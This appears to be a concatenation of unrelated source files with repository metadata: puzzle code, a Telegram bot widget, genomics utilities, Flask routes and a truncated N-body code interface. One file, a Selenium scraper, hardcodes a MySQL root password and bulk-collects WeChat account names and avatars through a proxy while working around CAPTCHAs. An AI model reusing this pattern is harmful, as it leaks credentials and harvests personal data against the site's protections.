| no_license | Godsmith/adventofcode2016 | 46639af6e015f0a024cde32ba0a1f98268899f4f | e036fb68bb53b9c79aa143b6c4645db218f77862 | refs/heads/master | 2020-06-15T04:21:21.012830 | 2017-01-10T21:52:30 | 2017-01-10T21:52:30 | 75,330,889 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 641 | py | class Range:
def __init__(self, low, high):
self.low = low
self.high = high
def __repr__(self):
return 'Range<%s-%s>' % (self.low, self.high)
def __hash__(self):
return hash(tuple([self.low, self.high]))
def __eq__(self, other):
return self.low == other.low and self.high == other.high
@classmethod
def combine(cls, ranges):
lowest = min([r.low for r in ranges])
highest = max([r.high for r in ranges])
return cls(lowest, highest)
def can_be_combined(self, range_):
return not (self.high < range_.low - 1 or self.low > range_.high + 1)
| [
"[email protected]"
]
| |
cc748c6aadec1a2627e7132cfd476d19c690933c | f7127398e6bc60cdece53014dfebb58aa99c0fbd | /aiogram_dialog/widgets/kbd/checkbox.py | b6a4e010a29614fdc9277b51a146f248f8d6f885 | []
| no_license | drforse/aiogram_dialog | 25fcae2579e9b37c43a41303232d009e04316c6a | 984496ee7818d7896235d20f30bb662f56293385 | refs/heads/master | 2023-02-28T21:39:53.331894 | 2021-02-05T05:50:15 | 2021-02-05T05:50:15 | 336,158,550 | 0 | 0 | null | 2021-02-05T03:58:44 | 2021-02-05T03:58:43 | null | UTF-8 | Python | false | false | 1,300 | py | from typing import Callable, Optional, Union, Dict, Awaitable
from aiogram.types import CallbackQuery
from aiogram_dialog.manager.manager import DialogManager
from aiogram_dialog.widgets.text import Text, Case
from .button import Button
OnStateChanged = Callable[[CallbackQuery, "Checkbox", DialogManager], Awaitable]
class Checkbox(Button):
def __init__(self, checked_text: Text, unchecked_text: Text,
id: str,
on_state_changed: Optional[OnStateChanged] = None,
when: Union[str, Callable] = None):
text = Case({True: checked_text, False: unchecked_text}, selector=self._is_text_checked)
super().__init__(text, id, self._on_click, when)
self.on_state_changed = on_state_changed
async def _on_click(self, c: CallbackQuery, button: Button, manager: DialogManager):
manager.context.set_data(self.widget_id, not self.is_checked(manager), internal=True)
if self.on_state_changed:
await self.on_state_changed(c, self, manager)
def _is_text_checked(self, data: Dict, case: Case, manager: DialogManager) -> bool:
return self.is_checked(manager)
def is_checked(self, manager: DialogManager) -> bool:
return manager.context.data(self.widget_id, False, internal=True)
| [
"[email protected]"
]
| |
fef0f186e3b388ef8dbb58d698766de6b8a4cbb0 | dee9432b12b8d5667ba3f58889344f89a032229d | /food/robots.py | 62e74a1df46393c50327b29f48029c5a8199bdf9 | []
| no_license | rolllyroman/lucas | a39743d697483f962617428bc61bfc053e9b4095 | e219ed3fc69ad36132ac4361c1766b279269323c | refs/heads/master | 2020-04-16T06:48:55.329438 | 2019-01-24T06:20:44 | 2019-01-24T06:20:44 | 150,229,829 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,006 | py | #coding:utf-8
import requests
import time
from lxml import etree
import json
# import MySQLdb
import pymysql
import random
import sys
reload(sys)
sys.setdefaultencoding( "utf-8" )
from constant import USER_AGENT
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
chromeOptions = webdriver.ChromeOptions()
# 设置代理
chromeOptions.add_argument("--proxy-server=http://112.85.167.11:9999")
# 一定要注意,=两边不能有空格,不能是这样--proxy-server = http://202.20.16.82:10152
driver = webdriver.Chrome(chrome_options = chromeOptions)
# 设置无头
# chrome_options = Options()
# chrome_options.add_argument('--headless')
# driver = webdriver.Chrome(chrome_options=chrome_options)
# driver = webdriver.Chrome()
HEADERS = {'Accept': 'text/html, application/xhtml+xml, image/jxr, */*',
'Accept-Language':'zh-Hans-CN, zh-Hans; q=0.5',
'Connection':'Keep-Alive',
# 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063'}
'User-Agent':random.choice(USER_AGENT),
}
BASIC_URL = "https://weixin.sogou.com/weixin?query=%s&_sug_type_=&s_from=input&_sug_=n&type=1&page=%s&ie=utf8"
conn = pymysql.connect(host="119.23.52.3",user="root",passwd="168mysql",db="haha",charset="utf8")
conn.autocommit(1) # conn.autocommit(True)
cursor = conn.cursor()
proxies_queue = []
# def put_proxy_queue():
# url = "https://proxyapi.mimvp.com/api/fetchsecret.php?orderid=862060912114100297&num=5&http_type=3&result_fields=1,2,3"
# resp = requests.get(url)
# content = resp.content
# datas = content.split('\r\n')
# for data in datas:
# http_ip = data.split(',')[0]
# https_ip = http_ip.split(":")[0] + data.split(',')[-1]
# proxies = {
# "http":http_ip,
# "https":https_ip,
# }
# try:
# print "测试结果:%s"%requests.get("http://www.baidu.com",proxies=proxies)
# except:
# print "失败proxies:%s"%proxies
# else:
# proxies_queue.append(proxies)
# print "now proxies_queue:%s"%proxies_queue
# def get_proxies():
# print "now proxies_queue:%s"%proxies_queue
# if len(proxies_queue) < 20:
# for i in range(1,6):
# print "wait for put proxy... %s"%i
# time.sleep(1)
# put_proxy_queue()
# res = random.choice(proxies_queue)
# try:
# requests.get("http://www.baidu.com",proxies=res)
# except:
# proxies_queue.remove(res)
# return get_proxies()
# else:
# return res
def if_list_code(weixins,detail_srcs):
if len(weixins) == 1:
code = raw_input("请输入验证码:")
code_label = driver.find_element_by_name("c")
code_label.send_keys(" ") # 防止发送不成功
code_label.clear()
code_label.send_keys(code)
submit_label = driver.find_element_by_id("submit")
submit_label.click()
time.sleep(1)
content = driver.page_source.encode("utf-8")
html = etree.HTML(content)
weixins = html.xpath("//label/text()")
detail_srcs = html.xpath("//li//div/p[@class='tit']/a/@href")
print "weixins:%s"%weixins
if len(weixins) == 1:
return if_list_code(weixins,detail_srcs)
return weixins,detail_srcs
def search_list(word):
print "search_list:%s"%word
for i in range(1,11):
url = BASIC_URL%(word,i)
# resp = requests.get(url,headers=HEADERS)
driver.get(url)
time.sleep(1)
content = driver.page_source.encode("utf-8")
html = etree.HTML(content)
# print resp.content.decode()
# print "============="
# print url
# print "============="
# print resp.status_code
weixins = html.xpath("//label/text()")
detail_srcs = html.xpath("//li//div/p[@class='tit']/a/@href")
weixins,detail_srcs = if_list_code(weixins,detail_srcs)
if not weixins:
break
deal_detail(weixins,detail_srcs)
def get_words():
words = set()
url = "https://hanyu.baidu.com/s?wd=%E7%99%BE%E5%AE%B6%E5%A7%93&from=poem"
resp = requests.get(url,headers=HEADERS)
resp.encoding = "utf-8"
html = resp.text
for w in html:
words.add(w)
return words
def main():
print "main start..."
words = get_words()
for w in words:
sql = "select word from got_word where word = %s"
cursor.execute(sql,(w,))
if cursor.fetchone():
print "%s 已搜过,跳过..."%w
continue
print "开始搜索:%s"%w
search_list(w)
sql = "insert into got_word(word) values(%s)"
cursor.execute(sql,(w,))
def if_detail_code(heads,names):
# 弹出详情验证码
if not names:
code = raw_input("请输入验证码:")
code_label = driver.find_element_by_id("input")
code_label.send_keys(" ") # 防止发送不成功
code_label.clear()
code_label.send_keys(code)
submit_label = driver.find_element_by_id("bt")
submit_label.click()
time.sleep(1)
content = driver.page_source.encode("utf-8")
html = etree.HTML(content)
heads = html.xpath("//div//span/img/@src")
names = html.xpath("//strong/text()")
if not names:
return if_detail_code(heads,names)
return heads,names
def deal_detail(weixins,detail_srcs):
print "deal_detail start..."
for i,weixin in enumerate(weixins):
sql = "select weixin from robot where weixin = %s"
cursor.execute(sql,(weixin,))
res = cursor.fetchone()
if res:
continue
src = detail_srcs[i]
# 详情名字和头像
# resp = requests.get(src,headers=HEADERS)
# html = etree.HTML(resp.content)
driver.get(src)
content = driver.page_source.encode("utf-8")
html = etree.HTML(content)
heads = html.xpath("//div//span/img/@src")
names = html.xpath("//strong/text()")
heads,names = if_detail_code(heads,names)
head = heads[0].replace("http","https")
name = names[0].strip()
sql = "insert into robot(weixin,name,head) values(%s,%s,%s)"
cursor.execute(sql,(weixin,name,head))
print weixin,name,head,"ok!"
time.sleep(1)
# def test2():
# url = "https://weixin.sogou.com/weixin?query=%E6%9D%8E&_sug_type_=&s_from=input&_sug_=n&type=1&page=222&ie=utf8"
# resp = requests.get(url,headers=HEADERS)
# html = etree.HTML(resp.content)
# weixins = html.xpath("//label/text()")
# print "==========================="
# print weixins
# print "==========================="
if __name__ == "__main__":
main()
cursor.close()
conn.close()
driver.close()
| [
"[email protected]"
]
| |
8c8b678d13701ba585b3238bd029821548cc4783 | f7550c4964dc8f3c59dbcebe39e947bd6a264dba | /1.Recorsions - 1/String into Int.py | 49eb468cd5f79f87fb2aa7dff14c15aa4c47eb1d | []
| no_license | Jashwanth-k/Data-Structures-and-Algorithms | db5e2e30932e0a35db578c19ae6cff9f147b7c3d | 1ebf9986999a474cb094f3ab04616a46f2887043 | refs/heads/main | 2023-08-25T02:57:17.394322 | 2021-10-11T15:27:56 | 2021-10-11T15:27:56 | 402,448,718 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 229 | py | def str_to_int(s):
l = len(s)
if l == 1:
return ord(s[0]) - ord('0')
a = str_to_int(s[1:])
b = ord(s[0]) - ord('0')
output = b*(10**(l-1)) + a
return output
s = ''
print(str_to_int(s)) | [
"[email protected]"
]
| |
2aa7e05f460ae0b7d0f6ea6a66312db082a1ce07 | da052c0bbf811dc4c29a83d1b1bffffd41becaab | /core/serial_number_expired_date/models/stock_picking.py | 6b51aa2baf397a198e54c46a84b406b3800e23da | []
| no_license | Muhammad-SF/Test | ef76a45ad28ac8054a4844f5b3826040a222fb6e | 46e15330b5d642053da61754247f3fbf9d02717e | refs/heads/main | 2023-03-13T10:03:50.146152 | 2021-03-07T20:28:36 | 2021-03-07T20:28:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,983 | py | # -*- coding: utf-8 -*-
import logging
from odoo import models, fields, api , _
import datetime
# from dateutil.relativedelta import relativedelta
from odoo.tools import DEFAULT_SERVER_DATETIME_FORMAT, float_compare, float_round
class PackOperation(models.Model):
_inherit = 'stock.pack.operation.lot'
expired_date = fields.Datetime(string='Expiry Date', store=True)
class Picking(models.Model):
_inherit = "stock.picking"
def _create_lots_for_picking(self):
Lot = self.env['stock.production.lot']
for pack_op_lot in self.mapped('pack_operation_ids').mapped('pack_lot_ids'):
if not pack_op_lot.lot_id:
lot = Lot.create({'name': pack_op_lot.lot_name, 'product_id': pack_op_lot.operation_id.product_id.id, 'use_date':pack_op_lot.expired_date,'expired_date':pack_op_lot.expired_date})
pack_op_lot.write({'lot_id': lot.id})
# TDE FIXME: this should not be done here
self.mapped('pack_operation_ids').mapped('pack_lot_ids').filtered(lambda op_lot: op_lot.qty == 0.0).unlink()
create_lots_for_picking = _create_lots_for_picking
class Quant(models.Model):
_inherit = "stock.quant"
expired_date = fields.Date(related='lot_id.use_date',string='Expiry Date', store=True)
class StockProductionLot(models.Model):
_inherit = 'stock.production.lot'
expired_date = fields.Datetime(string='Expiry Date', store=True)
# Assign dates according to products data
@api.model
def create(self, vals):
dates = self._get_dates(vals.get('product_id'))
product_id = vals.get('product_id')
exp_date = vals.get('expired_date')
if exp_date:
expired_date = datetime.datetime.strptime(exp_date, DEFAULT_SERVER_DATETIME_FORMAT)
else:
expired_date = datetime.datetime.now()
product = self.env['product.product'].browse(product_id)
if product:
for d in dates.keys():
if d in ['use_date']:
date = (expired_date - datetime.timedelta(days=product.removal_time)) + datetime.timedelta(days=product.use_time)
vals['use_date'] = fields.Datetime.to_string(date)
if d in ['life_date']:
date = (expired_date - datetime.timedelta(days=product.removal_time)) + datetime.timedelta(days=product.life_time)
vals['life_date'] = fields.Datetime.to_string(date)
if d in ['alert_date']:
date = (expired_date - datetime.timedelta(days=product.removal_time)) + datetime.timedelta(days=product.alert_time)
vals['alert_date'] = fields.Datetime.to_string(date)
if d in ['removal_date']:
date = expired_date
vals['removal_date'] = fields.Datetime.to_string(date)
return super(StockProductionLot, self).create(vals)
| [
"[email protected]"
]
| |
1939165261e9bc871d33a3d26d3408e0baaf61a6 | cd0591c773702d66d964e325f494b17918617949 | /hgvs/utils/altseq_to_hgvsp.py | f47725b71196b3a2abc09f81931572745eaf3ced | [
"Apache-2.0"
]
| permissive | SunbyMoon/hgvs | 9de0f1a2ddc134f072e490b989982d6e90bd164a | 2f348d53ee542576d0035a54757daa5dcd077e6b | refs/heads/master | 2020-03-22T15:51:35.995761 | 2018-07-03T04:19:09 | 2018-07-03T04:19:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,292 | py | # -*- coding: utf-8 -*-
"""Utility class for creating an hgvsp SequenceVariant object,
given a transcript with variants applied.
Used in hgvsc to hgvsp conversion.
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import hgvs
from ..edit import (AAExt, AAFs, AARefAlt, AASub, Dup)
from ..exceptions import (HGVSError)
from ..location import (AAPosition, Interval)
from ..posedit import (PosEdit)
from six.moves import range
DBG = False
class AltSeqToHgvsp(object):
def __init__(self, ref_data, alt_data):
"""Constructor
:param ref_data: reference transcript record
:type ref_data: recordtype
:param alt_data: alt transcript record
:type ref_data: recordtype
"""
self._ref_data = ref_data
self._alt_data = alt_data
self._protein_accession = self._ref_data.protein_accession
self._ref_seq = self._ref_data.aa_sequence
self._alt_seq = self._alt_data.aa_sequence
self._is_frameshift = self._alt_data.is_frameshift
self._frameshift_start = self._alt_data.frameshift_start
self._is_substitution = self._alt_data.is_substitution
self._is_ambiguous = self._alt_data.is_ambiguous
if DBG:
print("len ref seq:{} len alt seq:{}".format(len(self._ref_seq), len(self._alt_seq)))
print("fs start:{} protein ac:{}".format(self._frameshift_start, self._protein_accession))
print(self._ref_seq)
print(self._alt_seq)
print("aa variant start: {}".format(self._alt_data.variant_start_aa))
print(self._ref_data.transcript_sequence)
print(self._alt_data.transcript_sequence)
def build_hgvsp(self):
"""Compare two amino acid sequences; generate an hgvs tag from the output
:return list of variants in sequence order
:rtype list of dict
"""
variants = []
if not self._is_ambiguous and len(self._alt_seq) > 0:
do_delins = True
if self._ref_seq == self._alt_seq:
# Silent p. variant
start = self._alt_data.variant_start_aa
if start - 1 < len(self._ref_seq):
deletion = self._ref_seq[start - 1]
insertion = deletion
else:
start = ""
deletion = ""
insertion = ""
self._is_frameshift = False
variants.append({"start": start, "ins": insertion, "del": deletion})
do_delins = False
elif self._is_substitution:
if len(self._ref_seq) == len(self._alt_seq):
diff_pos = [(i, self._ref_seq[i], self._alt_seq[i]) for i in range(len(self._ref_seq))
if self._ref_seq[i] != self._alt_seq[i]]
if len(diff_pos) == 1:
(start, deletion, insertion) = diff_pos[0]
variants.append({"start": start + 1, "ins": insertion, "del": deletion})
do_delins = False
elif (self._alt_seq[self._alt_data.variant_start_aa - 1] == "*"
and self._ref_seq[self._alt_data.variant_start_aa - 1] != "*"):
# introduced stop codon
deletion = self._ref_seq[self._alt_data.variant_start_aa - 1:]
variants.append({"start": self._alt_data.variant_start_aa, "ins": "*", "del": deletion})
do_delins = False
if do_delins:
if self._alt_data.is_frameshift:
start = self._alt_data.variant_start_aa - 1
aa_start = self._alt_data.variant_start_aa
while self._ref_seq[start] == self._alt_seq[start]:
start += 1
aa_start += 1
insertion = list(self._alt_seq[start:])
deletion = list(self._ref_seq[start:])
variants.append({"start": aa_start, "ins": insertion, "del": deletion})
else: # non-frameshifting delins or dup
# get size diff from diff in ref/alt lengths
start = self._alt_data.variant_start_aa - 1
aa_start = self._alt_data.variant_start_aa
delta = len(self._alt_seq) - len(self._ref_seq)
while self._ref_seq[start] == self._alt_seq[start]:
start += 1
aa_start += 1
offset = start + abs(delta)
if delta > 0: # net insertion
insertion = list(self._alt_seq[start:offset])
deletion = []
ref_sub = self._ref_seq[start:]
alt_sub = self._alt_seq[offset:]
elif delta < 0: # net deletion
insertion = []
deletion = list(self._ref_seq[start:offset])
ref_sub = self._ref_seq[offset:]
alt_sub = self._alt_seq[start:]
else:
insertion = []
deletion = []
ref_sub = self._ref_seq[start:]
alt_sub = self._alt_seq[start:]
# from start, get del/ins out to last difference
diff_indices = [i for i in range(len(ref_sub)) if ref_sub[i] != alt_sub[i]]
if diff_indices:
max_diff = diff_indices[-1] + 1
insertion.extend(list(alt_sub[:max_diff]))
deletion.extend(list(ref_sub[:max_diff]))
variants.append({"start": aa_start, "ins": insertion, "del": deletion})
if DBG:
print(variants)
if self._is_ambiguous:
var_ps = [
self._create_variant(None, None, '', '', acc=self._protein_accession, is_ambiguous=self._is_ambiguous)
]
elif len(self._alt_seq) == 0:
var_ps = [
self._create_variant(
None,
None,
'',
'',
acc=self._protein_accession,
is_ambiguous=self._is_ambiguous,
is_no_protein=True)
]
else:
var_ps = [self._convert_to_sequence_variants(x, self._protein_accession) for x in variants]
if len(var_ps) > 1:
raise HGVSError("Got multiple AA variants - not supported")
return var_ps[0]
#
# internal methods
#
def _convert_to_sequence_variants(self, variant, acc):
"""Convert AA variant to an hgvs representation
:param variant: contains start, del, and ins
:type variant: dict
:param acc: protein accession
:type acc: str
:return hgvs string
:rtype str
"""
start = variant['start']
insertion = ''.join(variant['ins'])
deletion = ''.join(variant['del'])
# defaults
is_dup = False # assume not dup
fsext_len = None # fs or ext length
is_sub = False
is_ext = False
if start == 1: # initial methionine is modified
aa_start = aa_end = AAPosition(base=start, aa=deletion)
ref = ''
alt = ''
self._is_ambiguous = True # side-effect
if insertion and insertion.find("*") == 0: # stop codon at variant position
aa_start = aa_end = AAPosition(base=start, aa=deletion[0])
ref = ''
alt = '*'
is_sub = True
elif start == len(self._ref_seq): # extension
if self._alt_seq[-1] == '*':
fsext_len = len(insertion) - len(deletion) # don't include the former stop codon
else:
fsext_len = '?'
subst_at_stop_codon = insertion[0]
aa_start = aa_end = AAPosition(base=start, aa='*')
ref = ''
alt = subst_at_stop_codon
is_ext = True
elif self._is_frameshift: # frameshift
aa_start = aa_end = AAPosition(base=start, aa=deletion[0])
ref = ''
try:
fsext_len = str(insertion.index("*") + 1) # start w/ 1st change; ends w/ * (inclusive)
except ValueError:
fsext_len = "?"
alt = insertion[0]
else: # no frameshift - sub/delins/dup
if insertion == deletion: # silent
aa_start = aa_end = AAPosition(base=start, aa=deletion)
ref = alt = ''
elif len(insertion) == len(deletion) == 1: # substitution
aa_start = aa_end = AAPosition(base=start, aa=deletion)
ref = ''
alt = insertion
is_sub = True
elif len(deletion) > 0: # delins OR deletion OR stop codon at variant position
ref = deletion
end = start + len(deletion) - 1
if len(insertion) > 0: # delins
aa_start = AAPosition(base=start, aa=deletion[0])
if end > start:
aa_end = AAPosition(base=end, aa=deletion[-1])
else:
aa_end = aa_start
alt = insertion
else: # deletion OR stop codon at variant position
if len(deletion) + start == len(self._ref_seq): # stop codon at variant position
aa_start = AAPosition(base=start, aa=deletion[0])
aa_end = AAPosition(base=start, aa=deletion[0])
ref = ''
alt = '*'
is_sub = True
else: # deletion
aa_start = AAPosition(base=start, aa=deletion[0])
if end > start:
aa_end = AAPosition(base=end, aa=deletion[-1])
else:
aa_end = aa_start
alt = None
elif len(deletion) == 0: # insertion OR duplication OR extension
is_dup, dup_start = self._check_if_ins_is_dup(start, insertion)
if is_dup: # duplication
dup_end = dup_start + len(insertion) - 1
aa_start = AAPosition(base=dup_start, aa=insertion[0])
aa_end = AAPosition(base=dup_end, aa=insertion[-1])
ref = alt = None
else: # insertion
start -= 1
end = start + 1
aa_start = AAPosition(base=start, aa=self._ref_seq[start - 1])
aa_end = AAPosition(base=end, aa=self._ref_seq[end - 1])
ref = None
alt = insertion
else: # should never get here
raise ValueError("unexpected variant: {}".format(variant))
var_p = self._create_variant(
aa_start,
aa_end,
ref,
alt,
fsext_len=fsext_len,
is_dup=is_dup,
acc=acc,
is_ambiguous=self._is_ambiguous,
is_sub=is_sub,
is_ext=is_ext)
return var_p
def _check_if_ins_is_dup(self, start, insertion):
"""Helper to identify an insertion as a duplicate
:param start: 1-based insertion start
:type start: int
:param insertion: sequence
:type insertion: str
:return (is duplicate, variant start)
:rtype (bool, int)
"""
is_dup = False # assume no
variant_start = None
dup_candidate_start = start - len(insertion) - 1
dup_candidate = self._ref_seq[dup_candidate_start:dup_candidate_start + len(insertion)]
if insertion == dup_candidate:
is_dup = True
variant_start = dup_candidate_start + 1
return is_dup, variant_start
def _create_variant(self,
start,
end,
ref,
alt,
fsext_len=None,
is_dup=False,
acc=None,
is_ambiguous=False,
is_sub=False,
is_ext=False,
is_no_protein=False):
"""Creates a SequenceVariant object"""
if is_ambiguous:
posedit = None
else:
interval = Interval(start=start, end=end)
# Note - order matters
if is_no_protein:
edit = '0'
elif is_sub:
edit = AASub(ref=ref, alt=alt)
elif is_ext:
edit = AAExt(ref=ref, alt=alt, aaterm='*', length=fsext_len)
elif self._is_frameshift:
edit = AAFs(ref=ref, alt=alt, length=fsext_len)
elif is_dup:
edit = Dup()
elif ref == alt == '':
edit = AARefAlt(ref='', alt='')
else:
edit = AARefAlt(ref=ref, alt=alt)
posedit = PosEdit(pos=interval, edit=edit, uncertain=hgvs.global_config.mapping.inferred_p_is_uncertain)
var_p = hgvs.sequencevariant.SequenceVariant(acc, 'p', posedit)
return var_p
# <LICENSE>
# Copyright 2018 HGVS Contributors (https://github.com/biocommons/hgvs)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# </LICENSE>
| [
"[email protected]"
]
| |
20dd8bac432917f44ec65e02ad42a37c002d8dc7 | dd6c759081c1490c624de00f9519216613de5293 | /src/ui/__init__.py | 02186177946aec017837c2690ac545a6690800ea | [
"MIT"
]
| permissive | forcemain/SwarmOps | 76151fd31dff5288f3bc66a24c03547c6d9bb142 | 07675b362c83ce74bae13cb1c9ee627dc4ee25ed | refs/heads/master | 2021-06-18T12:41:11.960706 | 2017-05-10T01:04:44 | 2017-05-10T01:04:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,826 | py | # -*- coding:utf-8 -*-
#
# SwarmOps views for ui
#
from flask import Blueprint, render_template, url_for, redirect, g, abort
from utils.public import logger, login_required
ui_blueprint = Blueprint("ui", __name__, template_folder="templates", static_folder='static')
''' swarm route'''
@ui_blueprint.route("/")
@ui_blueprint.route("/swarm/")
@login_required
def index():
return render_template("swarm/swarm.html")
@ui_blueprint.route("/swarm/add/")
@login_required
def swarm_add():
return render_template("swarm/add.html")
@ui_blueprint.route("/swarm/init/")
@login_required
def swarm_init():
return render_template("swarm/init.html")
'''service route'''
@ui_blueprint.route("/service/")
@login_required
def service():
return render_template("service/service.html")
@ui_blueprint.route("/service/delete/")
@login_required
def service_delete():
return render_template("service/delete.html")
@ui_blueprint.route("/service/update/")
@login_required
def service_update():
return render_template("service/update.html")
@ui_blueprint.route("/service/create/")
@login_required
def service_create():
return render_template("service/create.html")
@ui_blueprint.route("/service/detail/")
@login_required
def service_detail():
return render_template("service/detail.html")
@ui_blueprint.route("/service/nginx/")
@login_required
def service_nginx():
return render_template("service/nginx.html")
'''node route'''
@ui_blueprint.route("/node/")
@login_required
def node():
return render_template("node/node.html")
@ui_blueprint.route("/node/add/")
@login_required
def node_add():
return render_template("node/add.html")
@ui_blueprint.route("/node/update/")
@login_required
def node_update():
return render_template("node/update.html")
@ui_blueprint.route("/node/delete/")
@login_required
def node_delete():
return render_template("node/delete.html")
'''misc route'''
@ui_blueprint.route("/misc/")
@login_required
def misc():
return render_template("misc.html")
@ui_blueprint.route("/storage/")
@login_required
def storage():
return render_template("misc/storage.html")
'''network route'''
@ui_blueprint.route("/network/")
@login_required
def network():
return render_template("network/network.html")
'''registry route'''
@ui_blueprint.route("/registry/")
@login_required
def registry():
return render_template("registry/registry.html")
@ui_blueprint.route("/registry/<namespace>/<repository_name>/")
@login_required
def registryImageName(namespace, repository_name):
return render_template("registry/imageName.html", imageName="{}/{}".format(namespace, repository_name).replace("_/", ""))
@ui_blueprint.route("/registry/<imageId>/")
@login_required
def registryImageId(imageId):
return render_template("registry/imageId.html", imageId=imageId)
| [
"[email protected]"
]
| |
b783d5bf51d4bb8dd0b44dab30f43382f53dfeb2 | bb9ab2b88c990377e58fd2b719a60f2e4a4689ce | /est-sfs/01_vcf_to_estsfs.py | 8304ae2a0ee0641c79e0ee2e8fe764171fc6c5b3 | []
| no_license | silvewheat/biocal-cli | 7ded0e05c134c932a7dd45130c546cd607b443b9 | 134a0bf4f0d318de50a92a1e72d18c13580e64e2 | refs/heads/master | 2022-12-11T21:04:25.240272 | 2022-11-28T02:40:02 | 2022-11-28T02:40:02 | 147,090,111 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,551 | py | # -*- coding: utf-8 -*-
"""
Created on 2022 10-14
@author: Yudongcai
@Email: [email protected]
"""
import re
import typer
import numpy as np
from cyvcf2 import VCF
from collections import Counter, defaultdict
def convert_gts(gt_bases):
gt_split = re.compile(r'[/|]')
bases = []
for base in gt_bases:
bases.extend(gt_split.split(base))
return bases
def main(vcffile: str = typer.Argument(..., help="input vcf file"),
focalsamples: str = typer.Argument(..., help="sample list for focal samples"),
outgroup1: str = typer.Argument(..., help="sample list for outgroup1"),
outgroup2: str = typer.Argument(..., help="sample list for outgroup2"),
outgroup3: str = typer.Argument(..., help="sample list for outgroup3"),
outprefix: str = typer.Argument(..., help="output prefix")):
focal_samples = [x.strip() for x in open(focalsamples)]
outgroup1_samples = [x.strip() for x in open(outgroup1)]
outgroup2_samples = [x.strip() for x in open(outgroup2)]
outgroup3_samples = [x.strip() for x in open(outgroup3)]
samples = focal_samples + outgroup1_samples + outgroup2_samples + outgroup3_samples
print(f'focal samples: {len(focal_samples)}\noutgroup1: {len(outgroup1_samples)}\noutgroup2: {len(outgroup2_samples)}\noutgroup3: {len(outgroup3_samples)}')
with open(f'{outprefix}_siteInfo.tsv', 'w') as f1, open(f'{outprefix}_datafile', 'w') as f2:
base2index = {'A': 0, 'C': 1, 'G': 2, 'T': 3}
f1.write('CHROM\tPOS\tREF\tALT\tmajorAllele\tminorAllele\n')
vcf = VCF(vcffile, gts012=True, samples=samples)
focal_selection = [True if x in focal_samples else False for x in vcf.samples]
outgroup1_selection = [True if x in outgroup1_samples else False for x in vcf.samples]
outgroup2_selection = [True if x in outgroup2_samples else False for x in vcf.samples]
outgroup3_selection = [True if x in outgroup3_samples else False for x in vcf.samples]
outgroup_selections = (outgroup1_selection, outgroup2_selection, outgroup3_selection)
for variant in vcf:
alleles = [variant.REF] + variant.ALT
f1.write(f'{variant.CHROM}\t{variant.POS}\t{variant.REF}\t' + ','.join(variant.ALT) + '\t')
counter_gts_focal = Counter(convert_gts(variant.gt_bases[focal_selection]))
major_allele = counter_gts_focal.most_common()[0][0]
try:
minor_allele = counter_gts_focal.most_common()[1][0]
except IndexError:
minor_allele = list(set(alleles) - set(major_allele))[0]
f1.write(f'{major_allele}\t{minor_allele}\n')
f2.write(f"{counter_gts_focal.get('A', 0)},{counter_gts_focal.get('C', 0)},{counter_gts_focal.get('G', 0)},{counter_gts_focal.get('T', 0)}")
for selection in outgroup_selections:
counts = ['0', '0', '0', '0'] # A C G T
counter_gts = Counter(convert_gts(variant.gt_bases[selection])).most_common()
first_base, first_count = counter_gts[0]
try:
second_base, second_count = counter_gts[1]
except IndexError:
second_count = 0
# 两种allele数量相等时按缺失处理
if (first_count > second_count) and (first_base != '.'):
counts[base2index[first_base]] = '1'
f2.write('\t'+','.join(counts))
f2.write('\n')
if __name__ == '__main__':
typer.run(main) | [
"[email protected]"
]
| |
80c66729e6cbcb7721e17efef2dc1381872cf87d | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_minefields.py | 9a6f4d39f05827d2da9dbb885032211575fb3e49 | [
"MIT"
]
| permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 234 | py |
#calss header
class _MINEFIELDS():
def __init__(self,):
self.name = "MINEFIELDS"
self.definitions = minefield
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['minefield']
| [
"[email protected]"
]
| |
469e38e83b1d2afb5cf82b1f1a90849485818ff4 | fa08376603d6136ec81f958510a363192c8ced83 | /site-packages/amuse/community/huayno/interface.py | b5b2c5802b0f60328edef50762add7d292694ac4 | []
| no_license | BrianTCook/amuse_env | e8da14e0bfd917179c3973e54daab1f980ae434c | 2e7eff89e82a859020604b692fb94bdd67ed7798 | refs/heads/master | 2021-05-18T21:14:52.897911 | 2020-04-04T16:11:58 | 2020-04-04T16:11:58 | 251,420,587 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,952 | py | from amuse.community import *
from amuse.community.interface.gd import GravitationalDynamicsInterface,GravityFieldInterface
from amuse.community.interface.gd import GravitationalDynamics,GravityFieldCode
class HuaynoInterface(CodeInterface,
LiteratureReferencesMixIn,
GravitationalDynamicsInterface,
StoppingConditionInterface,
GravityFieldInterface):
"""
HUAYNO is a code to solve the astrophysical N-body problem. It uses
recursive Hamiltonian splitting to generate multiple-timestep integrators
which conserve momentum to machine precision. A number of different
integrators are available. The code has been developed within the
AMUSE environment. It can make use of GPUs - for this an OpenCL
version can be compiled.
.. [#] Pelupessy, Federico I.; J\"anes, J\"urgen; Portegies Zwart, Simon, New Astronomy, Volume 17, Issue 8, p. 711-719
